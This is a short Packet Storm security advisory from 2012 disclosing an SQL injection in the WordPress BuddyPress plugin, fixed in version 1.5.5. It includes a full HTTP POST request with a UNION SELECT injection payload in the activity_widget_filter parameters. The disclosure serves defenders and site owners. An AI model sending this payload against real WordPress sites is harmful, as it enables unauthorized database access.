WordPress Buddypress SQL Injection

2012-04-04T00:00:00
ID PACKETSTORM:111539
Type packetstorm
Reporter Ivan Terkin
Modified 2012-04-04T00:00:00

Description

                                        
                                            `Hi,  
  
I would like disclosure SQL injection vulnerability if Buddypress plugin affecting last versions. This issue was reported to developers and resolved in 1.5.5 version. So, I suggest all having this plugin in their blogs update to last version, if you haven't done it yet. Example of POST message with sql injection is below.  
  
POST /wp-load.php HTTP/1.1  
User-Agent: Mozilla  
Host: example.com  
Accept: */*  
Referer: http://example.com/activity/?s=b  
Connection: Keep-Alive  
Content-Length: 153  
Content-Type: application/x-www-form-urlencoded  
  
action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+  
`